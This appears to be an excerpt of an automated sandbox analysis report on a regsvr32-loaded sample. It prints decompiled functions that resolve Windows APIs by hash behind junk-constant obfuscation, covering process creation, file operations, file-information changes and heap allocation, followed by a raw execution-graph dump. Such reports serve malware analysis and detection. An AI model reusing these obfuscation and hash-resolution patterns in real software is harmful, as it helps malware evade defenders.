                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0023816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0023C98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E00237F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00238236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 2875409e06d7524c936fa2df438a774fd70f73c3d399472faf43f7bcb5e2d76d
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 3421C072801248BBCF159F95CD0ACCEBFBAEB89714F108098FA1562121D3729A65EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00233466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E0023C98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E00237F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002334FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: a593693c1ca1b2dfb0d7fae86d7c87a0d132d5dbb8089cf1e34952918201f7ec
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 941136B1805248BBCF11DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0024EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E0023C98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E00237F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0024EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: ffc489184fc020cd7b1b94af0b296fd2da0242e536b2208345540ff3dbc18c35
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 531116B6C0121DFFCF10DFA4990A9EEBF74FB44314F108089E914A6254D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00247DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E0023C98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E00237F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00247E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 45c60d74af73033156b81c0e85074b14fd14e30a0f055bc02bbf5b2a54c80b65
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 0E1179B1D04208FBDB14DFA9D80A9DEBBB5EB45314F208199E418A6241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00233506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E0023C98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E00237F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002335AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: 3348ebbd0ed3fbd6771c3fb191f4d243f602650adc72133a48aff58be32b4c66
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: B41125B1D00208BFCF04EFA4D84689EBFB5EB44740F208088F9146A221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002402D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0023C98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E00237F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00240384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 7108f90ffa70f5c7a04d3180025419227052d6584d7599a7b8ad4918de900016
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 5C113D71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504A7280E7B15F219F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15
4644->4645 4645->4644 4649 30702a 4646->4649 4647 3071d4 4647->4551 4648 3031ea GetPEB 4648->4649 4649->4647 4649->4648 4663 321da1 4649->4663 4652 310256 4651->4652 4653 307f78 GetPEB 4652->4653 4654 3102c5 4653->4654 4654->4551 4656 321bf9 4655->4656 4667 31a873 4656->4667 4660 30429a 4659->4660 4661 307f78 GetPEB 4660->4661 4662 3042ff 4661->4662 4662->4640 4662->4643 4664 321dba 4663->4664 4665 307f78 GetPEB 4664->4665 4666 321e3b 4665->4666 4666->4649 4668 31a88e 4667->4668 4669 307f78 GetPEB 4668->4669 4670 31a906 4669->4670 4670->4552 4674 3139a7 4671->4674 4673 32131d GetPEB 4673->4674 4674->4673 4675 313b6a 4674->4675 4677 313b7f 4674->4677 4703 30cbbf 4674->4703 4707 31ec35 4674->4707 4678 3102d8 2 API calls 4675->4678 4677->4558 4678->4677 4680 31906e 4679->4680 4681 30cca2 GetPEB 4680->4681 4682 319163 4681->4682 4682->4558 4684 320618 4683->4684 4685 31a50a 2 API calls 4684->4685 4686 320876 4684->4686 4687 320863 4684->4687 4711 307e8a 4684->4711 4685->4684 4686->4558 4689 3102d8 2 API calls 4687->4689 4689->4686 4698 307223 4690->4698 4691 3125cd GetPEB 4691->4698 4692 30773f 4723 318e1d 4692->4723 4695 31f5d9 2 API calls 4695->4698 4696 30773d 4696->4558 4698->4691 4698->4692 4698->4695 4698->4696 4699 31f94b GetPEB 4698->4699 4715 3222f2 4698->4715 4719 3123c7 4698->4719 4699->4698 4701 307f78 GetPEB 4700->4701 4702 32139a 4701->4702 4702->4558 4704 30cbeb 4703->4704 4705 307f78 GetPEB 4704->4705 4706 30cc88 4705->4706 4706->4674 4708 31ec4c 4707->4708 4709 307f78 GetPEB 4708->4709 4710 31ecd5 4709->4710 4710->4674 4712 307eb1 4711->4712 4713 307f78 GetPEB 4712->4713 4714 307f13 4713->4714 4714->4684 4716 322310 4715->4716 4717 307f78 GetPEB 4716->4717 4718 3223a9 4717->4718 4718->4698 4720 312408 4719->4720 4721 307f78 GetPEB 4720->4721 4722 31247e 4721->4722 4722->4698 4724 318e30 4723->4724 4725 307f78 GetPEB 4724->4725 4726 318ea8 4725->4726 4726->4696 4728 307f78 GetPEB 4727->4728 4729 308d75 4728->4729 4729->4582 4734 30a504 4730->4734 4731 
30303a 2 API calls 4731->4734 4732 30a73d 4733 304e8f GetPEB 4732->4733 4735 30a73b 4733->4735 4734->4731 4734->4732 4734->4735 4735->4582 4737 3168f7 4736->4737 4738 307f78 GetPEB 4737->4738 4739 31697d 4738->4739 4739->4582 4741 30d3d5 4740->4741 4742 307f78 GetPEB 4741->4742 4743 30d45b 4742->4743 4743->3977 4745 30c0ca 4744->4745 4746 307f78 GetPEB 4745->4746 4747 30c145 4746->4747 4747->3977 4749 320e0b 4748->4749 4750 307f78 GetPEB 4749->4750 4751 320e6a 4750->4751 4751->3985 4753 31266d 4752->4753 4754 307f78 GetPEB 4753->4754 4755 3126e4 4754->4755 4755->3985 4758 302312 4756->4758 4757 310430 GetPEB 4757->4758 4758->4757 4759 30303a 2 API calls 4758->4759 4760 3025ce 4758->4760 4761 302606 4758->4761 4759->4758 4770 310430 4760->4770 4761->3985 4764 307f78 GetPEB 4763->4764 4765 313e80 4764->4765 4765->3985 4767 307c8d 4766->4767 4768 307f78 GetPEB 4767->4768 4769 307cf8 4768->4769 4769->3985 4771 310463 4770->4771 4772 307f78 GetPEB 4771->4772 4773 3104eb 4772->4773 4773->4761 4775 31ee30 4774->4775 4776 307f78 GetPEB 4775->4776 4777 31eeb4 4776->4777 4777->3802 4779 316d86 4778->4779 4780 307f78 GetPEB 4779->4780 4781 316e0c 4780->4781 4781->3998 4783 303f7b 4782->4783 4785 3041f2 4783->4785 4786 30419a 4783->4786 4803 303dfb 4783->4803 4785->4006 4787 30e4f5 2 API calls 4786->4787 4788 3041ac 4787->4788 4794 313094 4788->4794 4793 31f94b GetPEB 4793->4785 4807 313c24 4794->4807 4796 3041b8 4799 307f31 4796->4799 4800 307f56 4799->4800 4801 30adb7 GetPEB 4800->4801 4802 3041db 4801->4802 4802->4793 4804 303e15 4803->4804 4805 307f78 GetPEB 4804->4805 4806 303e89 4805->4806 4806->4783 4808 313c40 4807->4808 4809 307f78 GetPEB 4808->4809 4810 3131d0 4809->4810 4810->4796 4811 31660b 4810->4811 4812 316638 4811->4812 4813 307f78 GetPEB 4812->4813 4814 3166b2 4813->4814 4814->4796 4816 303ed1 4815->4816 4817 307f78 GetPEB 4816->4817 4818 303f40 4817->4818 4818->4013 4820 317a94 4819->4820 4821 307f78 GetPEB 4820->4821 4822 317b0d 4821->4822 4822->4013 4824 
313cd4 4823->4824 4825 307f78 GetPEB 4824->4825 4826 313d50 4825->4826 4826->4013 4838 3186ee 4827->4838 4831 317bbf 4830->4831 4861 30bd6b 4831->4861 4836 3102d8 2 API calls 4837 317d95 4836->4837 4837->4026 4845 31871a 4838->4845 4841 318946 4842 3102d8 2 API calls 4841->4842 4843 30caf4 4842->4843 4843->4026 4845->4841 4845->4843 4847 30823e 4845->4847 4851 30be5e 4845->4851 4854 31fc9e 4845->4854 4858 3026a7 4845->4858 4848 308254 4847->4848 4849 307f78 GetPEB 4848->4849 4850 3082c4 4849->4850 4850->4845 4852 307f78 GetPEB 4851->4852 4853 30bed7 4852->4853 4853->4845 4855 31fcb7 4854->4855 4856 307f78 GetPEB 4855->4856 4857 31fd34 4856->4857 4857->4845 4859 311919 GetPEB 4858->4859 4860 3026f5 4859->4860 4860->4845 4862 307f78 GetPEB 4861->4862 4863 30bdda 4862->4863 4863->4837 4864 31f73b 4863->4864 4865 31f75d 4864->4865 4866 307f78 GetPEB 4865->4866 4867 317d83 4866->4867 4867->4836 4876 31e8c1 4868->4876 4869 31ea86 4871 3117d2 GetPEB 4869->4871 4870 30303a 2 API calls 4870->4876 4872 31ea97 4871->4872 4872->4040 4874 31f5d9 2 API calls 4874->4876 4875 32224c GetPEB 4875->4876 4876->4869 4876->4870 4876->4872 4876->4874 4876->4875 4877 31f94b GetPEB 4876->4877 4886 318ef8 4876->4886 4877->4876 4879 318d46 4878->4879 4880 318d5c 4878->4880 4879->4880 4881 3117d2 GetPEB 4879->4881 4880->4040 4881->4879 4883 30be04 4882->4883 4890 307d03 4883->4890 4887 318f15 4886->4887 4888 30303a 2 API calls 4887->4888 4889 319000 4888->4889 4889->4876 4897 307d1b 4890->4897 4894 307e65 4894->4040 4895 307e67 4896 3117d2 GetPEB 4895->4896 4896->4894 4897->4894 4897->4895 4898 30303a 2 API calls 4897->4898 4899 310503 4897->4899 4915 318d61 4897->4915 4920 302710 4897->4920 4898->4897 4914 3112cb 4899->4914 4900 312519 GetPEB 4900->4914 4906 31f5d9 GetPEB RtlAllocateHeap 4906->4914 4907 31a379 GetPEB 4907->4914 4908 3117c5 4908->4897 4910 31fd42 GetPEB 4910->4914 4912 30d2c9 GetPEB 4912->4914 4913 31f94b GetPEB 4913->4914 4914->4900 4914->4906 4914->4907 4914->4908 
4914->4910 4914->4912 4914->4913 4929 30866c 4914->4929 4933 3164cf 4914->4933 4937 30ed0a 4914->4937 4951 30c98b 4914->4951 4955 31970d 4914->4955 4959 30a838 4914->4959 4963 30c01c 4914->4963 4916 3164cf GetPEB 4915->4916 4917 318e04 4916->4917 4918 3117d2 GetPEB 4917->4918 4919 318e16 4918->4919 4919->4897 4928 302d16 4920->4928 4921 302edc 4923 312519 GetPEB 4921->4923 4922 302eda 4922->4897 4923->4922 4924 31f5d9 GetPEB RtlAllocateHeap 4924->4928 4925 30866c GetPEB 4925->4928 4926 30d2c9 GetPEB 4926->4928 4927 31f94b GetPEB 4927->4928 4928->4921 4928->4922 4928->4924 4928->4925 4928->4926 4928->4927 4930 3086a1 4929->4930 4931 307f78 GetPEB 4930->4931 4932 308728 4931->4932 4932->4914 4934 3164e2 4933->4934 4935 307f78 GetPEB 4934->4935 4936 316555 4935->4936 4936->4914 4939 30fc94 4937->4939 4938 31014c 4941 312519 GetPEB 4938->4941 4939->4938 4940 31014a 4939->4940 4942 3117d2 GetPEB 4939->4942 4944 30303a 2 API calls 4939->4944 4945 30eb4b GetPEB 4939->4945 4946 31f5d9 GetPEB RtlAllocateHeap 4939->4946 4947 31f94b GetPEB 4939->4947 4948 310184 GetPEB 4939->4948 4949 30d2c9 GetPEB 4939->4949 4967 307a69 4939->4967 4971 31a42c 4939->4971 4940->4914 4941->4940 4942->4939 4944->4939 4945->4939 4946->4939 4947->4939 4948->4939 4949->4939 4952 30c9a7 4951->4952 4953 307f78 GetPEB 4952->4953 4954 30ca27 4953->4954 4954->4914 4956 31972f 4955->4956 4957 307f78 GetPEB 4956->4957 4958 31979e 4957->4958 4958->4914 4960 30a865 4959->4960 4961 307f78 GetPEB 4960->4961 4962 30a8e7 4961->4962 4962->4914 4964 30c035 4963->4964 4965 307f78 GetPEB 4964->4965 4966 30c0ac 4965->4966 4966->4914 4968 307a97 4967->4968 4969 307f78 GetPEB 4968->4969 4970 307b06 4969->4970 4970->4939 4972 31a461 4971->4972 4973 307f78 GetPEB 4972->4973 4974 31a4e8 4973->4974 4974->4939 4976 321a26 4975->4976 4977 3125cd GetPEB 4976->4977 4978 321b7b 4976->4978 4981 321b98 4976->4981 4999 3094d4 4976->4999 4977->4976 4995 3033b6 4978->4995 4981->4059 4984 30c83c 4982->4984 4983 31f5d9 2 API calls 
